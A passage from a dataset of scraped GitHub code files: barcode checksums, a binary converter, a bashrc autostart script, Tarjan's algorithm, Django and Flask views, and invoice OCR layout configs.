code_barre=\"NULL\"\r\n \r\n #time.sleep(3)\r\n else:\r\n i=code_barre.rfind('EAN-8:')\r\n if i!=-1 :\r\n code_barre=code_barre.replace('EAN-8:','')\r\n # if code_barre[len(code_barre)-1]==\"\\0\":\r\n code_barre=code_barre[:len(code_barre)-1]\r\n if checksum(code_barre)==False:\r\n code_barre=\"NULL\"\r\n else :\r\n code_barre=\"NULL\"\r\n #time.sleep(3)\r\n return code_barre \r\n \r\n \r\ndef detect_lines(gray):\r\n \r\n edges2 = cv2.Canny(gray,150,150,apertureSize = 3)\r\n minLineLength = 100\r\n maxLineGap = 40\r\n lines = cv2.HoughLinesP(edges2,1,np.pi/360,90,minLineLength,maxLineGap)\r\n return lines \r\n\r\ndef checksum(cdb):\r\n x=0\r\n y=0\r\n z=0\r\n i=0\r\n a=0\r\n leng=len(cdb)\r\n #print(cdb)\r\n last_number=int(cdb[leng-1])\r\n while i= 2:\n valid = False\n break\n except:\n valid = False\n break \n \n while valid == False:\n c = 0\n print(\"\\nPlease put in a valid binary number\")\n binary = input(\"Please put in a binary number to be converted:\\t\")\n for no in binary:\n try:\n if int(no) >= 2:\n valid = False\n break\n else:\n c += 1\n except:\n valid = False\n break\n \n if c == len(binary):\n valid = True\n \n rank = []\n for ind, no in enumerate(binary):\n rank.append(no)\n rank.append(int((len(binary)-ind) -1))\n \n result = 0\n for ind, no in enumerate(rank):\n if ind == 0 or ind%2 == 0:\n result += int(int(no) * 2) ** int(rank[ind+1])\n else:\n continue\n \n print(result)\n \n \nelse:\n number = input(\"\\nPlease put in a number to be converted to binary\\n\")\n while True:\n try:\n int(number)\n break\n except:\n print(\"\\nPlease put in a valid integer\")\n number = input(\"Please put in a number to be converted to binary\\n\")\n \n rem_list = []\n while int(number) >= 2:\n rem = int(number)%2\n number = int(number)//2\n rem_list.append(rem)\n rem_list.append(number)\n \n result = 0\n for t in range(len(rem_list)):\n if result == 0:\n result = f\"{rem_list[-(t+1)]}\"\n else:\n result = f\"{result}{rem_list[-(t+1)]}\"\n \n print(result)\n\n","repo_name":"OlascoWorks/Binary-calculator","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9858472274","text":"import os\nimport subprocess\n\n# Run the whoami command\noutput = subprocess.check_output([\"whoami\"])\n\n# Decode the output from bytes to string\nusername = output.decode().strip()\n\n# Store the username in a variable\ncurrent_user = username\n\n# Open bashrc file in append mode\nwith open(os.path.expanduser(\"~/.bashrc\"), \"a\") as bashrc_file:\n # Append current user to the file\n bashrc_file.write(f\"\\n sudo python3 /home/{current_user}/influx_query.py\")","repo_name":"WantClue/Pi-Zero-Solar","sub_path":"influxdb-LCD-bootable.py","file_name":"influxdb-LCD-bootable.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12866586250","text":"import sys\n\ndef SCCUtil(u, low_key, number, stackMember, st, index, graph, toFind):\n number[u] = index\n low_key[u] = index\n index += 1\n stackMember[u] = True\n st.append(u)\n for v in graph[u]:\n if number[v] == -1:\n SCCUtil(v, low_key, number, stackMember, st, index, graph, toFind)\n low_key[u] = min(low_key[u], low_key[v])\n elif stackMember[v] == True:\n low_key[u] = min(low_key[u], number[v])\n w = -1\n res = []\n isFound = False\n if low_key[u] == number[u]:\n while w != u:\n w = st.pop()\n if toFind == w:\n isFound = True\n res.append(w)\n stackMember[w] = False\n print(res)\n \ndef SCC(size, graph, toFind):\n number = [-1] * size\n low_key = [-1] * size\n stackMember = [False] * size\n st = []\n index = 0\n for i in range(size):\n if number[i] == -1:\n SCCUtil(i, low_key, number, stackMember, st, index, graph, toFind)\n\nif __name__ == \"__main__\":\n vertices = int(input())\n edges = int(input())\n adj_list = [set() for _ in range(vertices)]\n for _ in range(edges):\n edge = [int(x) for x in input().split()]\n adj_list[edge[0]].add(edge[1])\n toFind = int(input())\n print(adj_list)\n print(\"ToFind =\", toFind)\n SCC(vertices, adj_list, toFind)","repo_name":"tyao117/AlgorithmPractice","sub_path":"Tarjans_modified/Tarjans.py","file_name":"Tarjans.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39259195686","text":"import logging\nimport time\n\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.utils.urls import replace_query_param\nfrom rest_framework.views import APIView\n\nfrom eums.api.filter.filter_mixin import RequestFilterMixin\nfrom eums.api.sorting.standard_dic_sort import StandardDicSort\nfrom eums.models import DistributionPlanNode, DistributionPlan, Flow\nfrom eums.permissions.stock_report_permissions import StockReportPermissions\n\nPAGE_SIZE = 10\nsort = StandardDicSort('last_shipment_date', 'last_received_date',\n 'total_value_received', 'total_value_dispensed', 'total_value_lost', 'balance')\n\nmixin = RequestFilterMixin()\n\nlogger = logging.getLogger(__name__)\n\n\nclass StockReport(APIView):\n permission_classes = (StockReportPermissions,)\n\n def get(self, request):\n reduced_stock_report = filter_stock_report(request)\n totals = _compute_totals(reduced_stock_report)\n reduced_stock_report = sort.sort_by(request, reduced_stock_report)\n paginated_results = Paginator(reduced_stock_report, PAGE_SIZE)\n\n page_number = _get_page_number(request)\n results_current_page = paginated_results.page(page_number)\n\n data = {\n 'next': _has_page(results_current_page.has_next(), _get_page_number(request) + 1, request),\n 'previous': _has_page(results_current_page.has_previous(), _get_page_number(request) - 1, request),\n 'count': len(reduced_stock_report),\n 'pageSize': PAGE_SIZE,\n 'results': results_current_page.object_list,\n 'totals': totals\n }\n\n return Response(data, status=status.HTTP_200_OK)\n\n\ndef filter_stock_report(request):\n consignee_id = request.GET.get('consignee')\n location = request.GET.get('location')\n outcome_id = request.GET.get('outcome')\n from_date = request.GET.get('fromDate')\n to_date = request.GET.get('toDate')\n\n stock_report = _build_stock_report(consignee_id, location, outcome_id, from_date, to_date)\n reduced_stock_report = _reduce_stock_report(stock_report)\n return reduced_stock_report\n\n\ndef _build_stock_report(consignee_id, location, outcome_id, from_date, to_date):\n ip_nodes = DistributionPlanNode.objects.filter(\n Q(tree_position=Flow.Label.IMPLEMENTING_PARTNER) &\n (\n Q(distribution_plan__track=True) |\n (\n Q(distribution_plan__track=False) & Q(distribution_plan__is_auto_track_confirmed=True)\n )\n )\n )\n\n mixin.supported_filters = {\n \"consignee_id\": \"consignee_id\",\n \"location\": \"location__icontains\",\n \"outcome_id\": \"programme_id\",\n \"from_date\": \"delivery_date__gte\",\n \"to_date\": \"delivery_date__lte\"\n }\n filters = mixin.build_filters(\n {'consignee_id': consignee_id, 'location': location,\n 'outcome_id': outcome_id, 'from_date': from_date, 'to_date': to_date})\n\n ip_nodes = ip_nodes.filter(**filters)\n return reduce(_aggregate_nodes_into_stock_report, ip_nodes, [])\n\n\ndef _aggregate_nodes_into_stock_report(stock_report, node):\n if node.item:\n stock_report.append(_get_report_details_for_node(node))\n return stock_report\n\n\ndef _get_report_details_for_node(node):\n purchase_order_number = node.item.number()\n quantity_received = _compute_quantity_received(node)\n total_value_received = quantity_received * node.item.unit_value()\n quantity_lost = node.total_amount_lost()\n total_value_lost = quantity_lost * node.item.unit_value()\n remark_lost = node.total_lost_remark()\n quantity_dispensed = node.quantity_out()\n value_dispensed = quantity_dispensed * node.item.unit_value()\n ip_delivery = DistributionPlan.objects.get(pk=node.distribution_plan.id)\n\n received_date = ip_delivery.received_date()\n\n quantity_in = node.quantity_in()\n\n result = {'document_number': purchase_order_number, 'programme': node.programme.name,\n 'last_shipment_date': str(node.delivery_date), 'last_received_date': str(received_date),\n 'total_value_received': total_value_received, 'total_value_dispensed': value_dispensed,\n 'total_value_lost': total_value_lost,\n 'balance': (total_value_received - value_dispensed - total_value_lost), 'items': [\n {'code': node.item.item.material_code, 'description': node.item.item.description, 'location': node.location,\n 'consignee': node.consignee.name, 'quantity_delivered': quantity_in,\n 'date_delivered': str(node.delivery_date), 'quantity_confirmed': quantity_received,\n 'date_confirmed': str(received_date), 'quantity_dispatched': quantity_dispensed,\n 'quantity_lost': quantity_lost, 'remark_lost': remark_lost,\n 'balance': quantity_received - quantity_dispensed - quantity_lost}]}\n return result\n\n\ndef _get_responses(node):\n latest_run = node.latest_run()\n if latest_run:\n return latest_run.questions_and_responses()\n return {}\n\n\ndef _compute_quantity_received(node):\n responses = _get_responses(node)\n return responses.get('amountReceived', 0)\n\n\ndef _get_date_received(node):\n responses = _get_responses(node)\n return responses.get('dateOfReceipt', '')\n\n\ndef _reduce_stock_report(stock_report):\n reduced_report = []\n for report_item in stock_report:\n matching_report_item = _find_item_in_stock_report(reduced_report, report_item)\n if matching_report_item:\n _update_report_item(matching_report_item, report_item)\n else:\n reduced_report.append(report_item)\n return sorted(reduced_report, key=lambda d: d.get('last_shipment_date'), reverse=True)\n\n\ndef _compute_totals(stock_report):\n total_received = round(\n reduce(lambda total, report_item: total + report_item['total_value_received'], stock_report, 0), 2)\n total_dispensed = round(\n reduce(lambda total, report_item: total + report_item['total_value_dispensed'], stock_report, 0), 2)\n total_lost = round(reduce(lambda total, report_item: total + report_item['total_value_lost'], stock_report, 0), 2)\n total_left = round(total_received - total_dispensed - total_lost, 2)\n\n return {\n 'total_received': total_received,\n 'total_dispensed': total_dispensed,\n 'total_lost': total_lost,\n 'balance': total_left\n }\n\n\ndef _find_item_in_stock_report(reduced_report, report_item):\n for item in reduced_report:\n if item['document_number'] == report_item['document_number']:\n return item\n return None\n\n\ndef _update_report_item(matching_report_item, report_item):\n matching_report_item['total_value_received'] = matching_report_item['total_value_received'] + report_item[\n 'total_value_received']\n matching_report_item['total_value_dispensed'] = matching_report_item['total_value_dispensed'] + report_item[\n 'total_value_dispensed']\n matching_report_item['total_value_lost'] = matching_report_item['total_value_lost'] + report_item[\n 'total_value_lost']\n matching_report_item['balance'] = matching_report_item['total_value_received'] - matching_report_item[\n 'total_value_dispensed'] - matching_report_item['total_value_lost']\n matching_report_item['items'].append(report_item['items'][0])\n\n if matching_report_item['last_shipment_date'] < report_item['last_shipment_date']:\n matching_report_item['last_shipment_date'] = report_item['last_shipment_date']\n\n\ndef _get_page_number(request):\n if request.GET.get('page'):\n return int(request.GET.get('page'))\n else:\n return 1\n\n\ndef _has_page(has_page, page, request):\n base_url = replace_query_param(request.build_absolute_uri(), 'page', page)\n return None if has_page is False else base_url\n","repo_name":"unicefuganda/eums","sub_path":"eums/api/stock_report/stock_report_endpoint.py","file_name":"stock_report_endpoint.py","file_ext":"py","file_size_in_byte":7877,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"3835825895","text":"\"\"\"Unit test package for web3data.\"\"\"\n\nfrom web3data.chains import Chains\n\nAPI_PREFIX = \"https://web3api.io/api/v2/\"\nHEADERS = {\"foo\": \"bar\", \"baz\": \"qux\"}\nRESPONSE = {\"test\": \"data\"}\nCHAINS = (\n Chains.BTC,\n Chains.BCH,\n Chains.BSV,\n Chains.ETH,\n Chains.ETH_RINKEBY,\n Chains.LTC,\n Chains.ZEC,\n)\n","repo_name":"dmuhs/web3data-py","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"39838336660","text":"#page_res = [4134,5846]\n\n# ####### (1918, 1050)\n\n\ncoordinates_1 = [[(229, 264), (1938, 1059)],[(465, 1470), (1743, 550)],[(2172, 11), (1844, 1212)],[(3503, 1852), (477, 1259)],[(2312, 822), (1568, 341)]]\ncoordinates_1 = [['Dodavatel:', [4,5]],[(465, 1470), (1743, 550)],[(2172, 11), (1844, 1212)],[(3503, 1852), (477, 1259)]]\n\n\n\nlayout_1 = [[\n\n {\"title\": \"NaSupRe\", \"key\" : \"Dodavatel:\", \"dist\": \"IČ:\"},\n {\"title\": \"INSuRe\", \"key\" : \"IČ:\", \"dist\": \"_next_\"},\n {\"title\": \"'TIDSupRe\", \"key\" : \"'DIČ:\", \"dist\": \"_next_\"},\n {\"title\": \"Telefon\", \"key\" : \"Telefon:\", \"dist\": \"Mobil:\"},\n {\"title\": \"Mobil\", \"key\" : \"Mobil:\", \"dist\": \"Fax:\"},\n {\"title\": \"Fax\", \"key\" : \"Fax:\", \"dist\": \"_next_\"},\n {\"title\": \"EmAdr\", \"key\" : \"E-mail:\", \"dist\": 1},\n\n\n],\n[\n {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n {\"title\": \"PayDay\", \"key\" : \"splatnosti:\", \"dist\": \"_next_\"},\n {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n],\n[\n {\"title\": \"InNum\", \"key\" : \"DOKLAD\" , \"dist\" : '2' },\n {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n {\"title\": \"NaUseTy\", \"key\" : \"DIČ:\" , \"dist\" : [2,'_line_'] },\n {\"title\": \"AddUseTy\", \"key\" : \"DIČ:\" , \"dist\" : [2,'_rest_'] },\n \n],\n[ \n {\"title\": \"ToInv\", \"key\" : '-' , \"dist\" : {\"LINE\":-1}},\n \n],\n\n]\n\n\n\n############\n\ncoordinates_2 = [[(341, 175), (1866, 1650)],[(2172, 183), (1830, 1584)]]\n\n\nlayout_2 = [\n \n [\n\n \n {\"title\": \"NaSupRe\", \"key\" : \"Dodavatel:\", \"dist\": [5,\"_line_\"]},\n {\"title\": \"INSuRe\", \"key\" : \"IČ:\", \"dist\": \"_next_\"},\n {\"title\": \"TIDSupRe\", \"key\" : \"IČ:\", \"dist\": \"3\"},\n {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [4,'Bankovní'] },\n {\"title\": \"BaAcSupRe\", \"key\" : \"Banka:\", \"dist\": \"IBAN/SWIFT:\" },\n {\"title\": \"IBNSupAc\", \"key\" : \"IBAN/SWIFT:\", \"dist\": \"_next_\"},\n {\"title\": \"BICSupAc\", \"key\" : \"IBAN/SWIFT:\", \"dist\": \"3\"},\n\n\n ],\n\n[\n {\"title\": \"InNum\", \"key\" : \"DOKLAD\" , \"dist\" : '2' },\n {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n {\"title\": \"NaUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'_line_'] },\n {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'Tel.:'] },\n {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n {\"title\": \"PayDay\", \"key\" : \"splatnosti:\", \"dist\": \"_next_\"},\n {\"title\": \"VATDay\", \"key\" : \"platby:\", \"dist\": \"_next_\"},\n \n],\n\n]\n\n#############################################################\ncoordinates_3 = [[(200, 17), (1095, 403)],[(1471, 140), (595, 306)],[(1996, 131), (1305, 262)],[(3056, 393), (815, 394),],\n[(2000, 402), (1857, 1619)],[(1716, 2677), (464, 884)]]\n\n\nlayout_3 = [\n \n [\n\n \n {\"title\": \"NaSupRe\", \"key\" : 0 , \"dist\": [1,\"_line_\"]},\n {\"title\": \"AddUseTy\", \"key\" : 0 , \"dist\" : [1,\"_rest_\"] },\n\n # {\"title\": \"TIDSupRe\", \"key\" : \"IČ:\", \"dist\": \"3\"},\n # {\"title\": \"BaAcSupRe\", \"key\" : \"Banka:\", \"dist\": \"IBAN/SWIFT:\" },\n # {\"title\": \"IBNSupAc\", \"key\" : \"IBAN/SWIFT:\", \"dist\": \"_next_\"},\n # {\"title\": \"BICSupAc\", \"key\" : \"IBAN/SWIFT:\", \"dist\": \"3\"},\n # {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n\n\n ],\n\n [ \n {\"title\": \"INSuRe\", \"key\" : \"IČ:\", \"dist\": \"_next_\"},\n {\"title\": \"TIDSupRe\", \"key\" : \"DIČ:\", \"dist\": \"_next_\"},\n # {\"title\": \"InNum\", \"key\" : \"DOKLAD\" , \"dist\" : '2' },\n # {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n # {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n # {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n # {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n # {\"title\": \"NaUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'_line_'] },\n # {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'Tel.:'] },\n # {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n # {\"title\": \"PayDay\", \"key\" : \"splatnosti:\", \"dist\": \"_next_\"},\n # {\"title\": \"VATDay\", \"key\" : \"platby:\", \"dist\": \"_next_\"},\n \n ],\n\n [\n {\"title\": \"Telefon\", \"key\" : \"tel.:\", \"dist\": \"_next_\"},\n {\"title\": \"Mobil\", \"key\" : \"mobil:\", \"dist\": \"_next_\"},\n {\"title\": \"Fax\", \"key\" : \"fax:\", \"dist\": \"_next_\"},\n {\"title\": \"EmAdr\", \"key\" : \"email:\", \"dist\": \"_next_\"},\n ],\n\n [\n {\"title\": \"InNum\", \"key\" : 0 , \"dist\": [1,\"_next_\"]}\n ],\n\n [\n {\"title\": \"NaCusTy\", \"key\" : \"Odběratel\" , \"dist\" : '_line_' },\n {\"title\": \"AdCus\", \"key\" : \"Odběratel\" , \"dist\" : \"IČ:\"},\n {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n\n ],\n \n [\n {\"title\": \"ToInv\", \"key\" : '-' , \"dist\" : {\"LINE\":-1}},\n ]\n\n]\n\n############\n\ncoordinates_4 = [[(2758, 8), (1314, 1532)],[(1278, 673), (1542, 849)],[(324, 113), (989, 1427)],[(2732, 4559), (1279, 753)],\n [(2732, 4559), (1279, 753)]]\n\n\nlayout_4 = [\n \n [\n\n \n {\"title\": \"NaSupRe\", \"key\" : \"Dodavatel:\", \"dist\": [1,\"_line_\"]},\n {\"title\": \"AddUseTy\", \"key\" : \"Dodavatel:\" , \"dist\" : [1,'IČO:'] },\n {\"title\": \"INSuRe\", \"key\" : \"IČO:\", \"dist\": \"_next_\"},\n {\"title\": \"TIDSupRe\", \"key\" : \"DIČ:\", \"dist\": \"_next_\"},\n {\"title\": \"BaAcSupRe\", \"key\" : \"účet\", \"dist\": \"2\" },\n {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n {\"title\": \"Telefon\", \"key\" : \"Telefony:\", \"dist\": \"_rest_\"},\n\n\n\n\n ],\n\n[\n {\"title\": \"PayDay\", \"key\" : \"SPLATNOSTI:\", \"dist\": \"_next_\"},\n {\"title\": \"ToInv\", \"key\" : \"ÚHRADĚ:\" , \"dist\" : \"DATUM\" },\n {\"title\": \"InNum\", \"key\" : \"DOKLAD\" , \"dist\" : '2' },\n# {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n# {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n# {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n# {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n# {\"title\": \"NaUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'_line_'] },\n# {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'Tel.:'] },\n# {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n# {\"title\": \"VATDay\", \"key\" : \"platby:\", \"dist\": \"_next_\"},\n \n],\n [\n {\"title\": \"NaCusTy\", \"key\" : \"Odběratel\" , \"dist\" : [2,'_line_'] },\n {\"title\": \"AdCus\", \"key\" : \"Odběratel\" , \"dist\" : [2,'IČO:']},\n {\"title\": \"INUseTy\", \"key\" : \"IČO:\" , \"dist\" : '_next_' },\n {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' }, \n {\"title\": \"BaAcSupAc\", \"key\" : \"Bankovní\" , \"dist\" : '2' },\n ],\n\n [\n {\"title\": \"ToInv\", \"key\" : \"úhradě\" , \"dist\" : \"_rest_\", \"preprocessor\" : \"_num_\", \"postprocessor\" : \"_test_\"},\n\n ]\n]\n############\n\ncoordinates_5 = [[(0, 26), (1973, 1129)],[(5, 1794), (1990, 1171)],[(1965, 223), (2066, 2777)],[(2413, 8130), (1495, 765)]]\n\n\nlayout_5 = [\n \n [\n\n \n {\"title\": \"NaSupRe\", \"key\" : \"Dodává:\", \"dist\": \"_line_\"},\n {\"title\": \"AddUseTy\", \"key\" : \"Dodává:\" , \"dist\" : \"Tel/Fax:\" },\n {\"title\": \"INSuRe\", \"key\" : \"IČO:\", \"dist\": \"_next_\"},\n {\"title\": \"TIDSupRe\", \"key\" : \"DIČ:\", \"dist\": \"_next_\"},\n # {\"title\": \"BaAcSupRe\", \"key\" : \"účet\", \"dist\": \"2\" },\n # {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n # {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n # {\"title\": \"Telefon\", \"key\" : \"Telefony:\", \"dist\": \"_rest_\"},\n\n\n\n\n ],\n\n [\n {\"title\": \"AddUseTy\", \"key\" : \"zboží/služby:\" , \"dist\" : \"GLN:\" },\n\n# {\"title\": \"PayDay\", \"key\" : \"SPLATNOSTI:\", \"dist\": \"_next_\"},\n# {\"title\": \"ToInv\", \"key\" : \"ÚHRADĚ:\" , \"dist\" : \"DATUM\" },\n# {\"title\": \"VaSym\", \"key\" : \"Variabilní\" , \"dist\" : '2' },\n# {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '2' },\n# {\"title\": \"INUseTy\", \"key\" : \"IČ:\" , \"dist\" : '_next_' },\n# {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n# {\"title\": \"NaUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'_line_'] },\n# {\"title\": \"AddUseTy\", \"key\" : \"IČ:\" , \"dist\" : [2,'Tel.:'] },\n# {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n# {\"title\": \"VATDay\", \"key\" : \"platby:\", \"dist\": \"_next_\"},\n # {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n\n \n ],\n [\n {\"title\": \"InNum\", \"key\" : \"FAKTURY/VARIABILNÍ\" , \"dist\" : '2' },\n {\"title\": \"BaAcSupAc\", \"key\" : \"Banka:\" , \"dist\" : 'Konstantní' },\n {\"title\": \"VaSym\", \"key\" : \"FAKTURY/VARIABILNÍ\" , \"dist\" : '2' },\n {\"title\": \"KoSy\", \"key\" : \"Konstantní\" , \"dist\" : '_next_' },\n {\"title\": \"NaCusTy\", \"key\" : \"dokladu:\" , \"dist\" : \"Splatnost\" },\n # {\"title\": \"AdCus\", \"key\" : \"Odběratel\" , \"dist\" : [2,'IČO:']},\n # {\"title\": \"INUseTy\", \"key\" : \"IČO:\" , \"dist\" : '_next_' },\n # {\"title\": \"TIDUseTy\", \"key\" : \"DIČ:\" , \"dist\" : '_next_' },\n {\"title\": \"PayDay\", \"key\" : \"Splatnost\", \"dist\": \"2\"},\n {\"title\": \"IssDay\", \"key\" : \"vystavení:\", \"dist\": \"_next_\"},\n {\"title\": \"VATDay\", \"key\" : \"plnění:\", \"dist\": \"_next_\"},\n \n ],\n\n [\n {\"title\": \"ToInv\", \"key\" : \"ÚHRADĚ\" , \"dist\" : \"_rest_\"},\n ]\n\n \n]\n\n################################################################\nlist_of_layouts = [layout_1,layout_2,layout_3,layout_4,layout_5]\nlist_of_coordinates = [coordinates_1,coordinates_2,coordinates_3,coordinates_4,coordinates_5]\npage_res = [[4134,5846],[4134,5846],[4134,5846],[4134,5846],[4132,11696]]\n\n\ndef segmap(layout_query):\n \n for counter, layout in enumerate(list_of_layouts):\n if layout_query == (counter+1):\n return layout\n \n return -1\n\ndef scaler(base_res,new_res,input_list):\n new_list = []\n \n x_ratio = new_res[0] / base_res[0]\n y_ratio = new_res[1] / base_res[1]\n\n invert = False\n\n for item in input_list:\n if isinstance(item[0][1], str) and isinstance(item[0][0], str) and isinstance(item[0],tuple):\n invert = True\n\n x = int( x_ratio * int(item[0][0]) ) if isinstance(item[0],tuple) else item[0]\n y = int( y_ratio * int(item[0][1]) ) if isinstance(item[0],tuple) else None\n\n # precenage_coffecies_w = 1 if not isinstance(item[1],list) else item[1][0]\n # precenage_coffecies_h = 1 if not isinstance(item[1],list) else item[1][1]\n\n if isinstance(item[1],list): # height and width was besed on percentage\n item[1][0] = int(item[1][0] * new_res[0] / 100)\n item[1][1] = int(item[1][1] * new_res[1] / 100)\n\n\n w = int( x_ratio * item[1][0] ) if isinstance(item[1][0], int) else item[1][0]# do not scale if it is until line\n h = int( y_ratio * item[1][1] ) if isinstance(item[1][0], int) else item[1][1]\n \n if (invert):\n x = str(x)\n y = str(y)\n\n final_scaled = [(x,y),(w,h)] if y is not None else [x,(w,h)]\n new_list.append(final_scaled)\n return new_list\n\ndef coordinates(coordinate_query,shape):\n \n new_res = list(shape)[:2]\n new_res[1],new_res[0] = new_res[0] , new_res [1]\n for counter, coordinate in enumerate(list_of_coordinates):\n if coordinate_query == (counter+1):\n return scaler(base_res=page_res[coordinate_query-1],new_res=new_res,input_list = coordinate) # Scale it to the resulution\n \n #print(\"err\")\n return -1\n\n\n\n","repo_name":"Sinamirshahi/keenbeta","sub_path":"utb/config copy.py","file_name":"config copy.py","file_ext":"py","file_size_in_byte":12470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4918260261","text":"from flask import Blueprint, render_template, request, redirect, session, url_for\nfrom models.project_model import Project\nfrom app import db\nfrom decorators.auth_decors import isLoggedIn\nfrom sqlalchemy import and_\nimport markdown\n\nprojects_bp = Blueprint(\"projects\", __name__, template_folder=\"templates\")\n\n@projects_bp.route(\"/projects\")\ndef projects():\n projects = None\n\n if \"username\" in session:\n projects = Project.query.all()\n else:\n projects = Project.query.filter(Project.published==1).all()\n\n return render_template(\"projects.html\", projects=projects)\n\n@projects_bp.route(\"/project/\")\ndef project(id):\n project = Project.query.filter(Project.id==id).first()\n\n if \"username\" not in session and project.published != 1:\n return \"Not enough permissions.\"\n\n html_content = markdown.markdown(project.content)\n\n return render_template(\"project.html\", project=project, html_content=html_content)\n\n@projects_bp.route(\"/edit_project/\")\n@isLoggedIn\ndef edit_project(id):\n if session[\"permissions\"] != 1:\n return \"Error.\"\n\n project = Project.query.filter(id==id).first()\n\n return render_template(\"edit_project.html\", project=project, project_id=id)\n\n@projects_bp.route(\"/update_project\", methods=[\"POST\"])\n@isLoggedIn\ndef update_project():\n if session[\"permissions\"] != 1:\n return \"Error.\"\n\n title = request.form.get(\"title\")\n description = request.form.get(\"description\")\n content = request.form.get(\"content\")\n id = request.form.get(\"id\", type=int)\n\n project = Project.query.filter(Project.id==id).first()\n\n project.title = title\n project.description = description\n project.content = content\n\n db.session.commit()\n\n return redirect(\"/\")\n\n@projects_bp.route(\"/create_project\", methods=[\"GET\", \"POST\"])\n@isLoggedIn\ndef create_project():\n if session[\"permissions\"] != 1:\n return \"Error.\"\n \n if request.method == \"POST\":\n title = request.form.get(\"title\")\n description = request.form.get(\"description\")\n\n project = Project(title=title, description=description, content=f\"#{title}\")\n\n db.session.add(project)\n db.session.commit()\n\n return redirect(\"/projects\")\n\n return render_template(\"create_project.html\")\n\n@projects_bp.route(\"/delete_project/\")\n@isLoggedIn\ndef delete_project(id):\n if session[\"permissions\"] != 1:\n return \"Error.\"\n \n project = Project.query.get(id)\n db.session.delete(project)\n db.session.commit()\n\n return redirect(\"/projects\")","repo_name":"adam077x/heczkoadam","sub_path":"controllers/projects_controller.py","file_name":"projects_controller.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71376543228","text":"from kivy.uix.textinput import TextInput\nfrom kivy.properties import StringProperty\nimport functools\nimport re\n\nDEFAULT_PADDING = 6\n\n\nclass AlignedTextInput(TextInput):\n halign = StringProperty('left')\n valign = StringProperty('top')\n pat = re.compile(r'[^\\u00f7\\u00d7+0-9]')\n\n def insert_text(self, substring, from_undo=False):\n pat = self.pat\n if '.' in self.text:\n s = re.sub(pat, '', substring)\n else:\n s = '.'.join([re.sub(pat, '', s) for s in substring.split('.', 1)])\n return super(AlignedTextInput, self).insert_text(s, from_undo=from_undo)\n\n def __init__(self, **kwargs):\n self.halign = 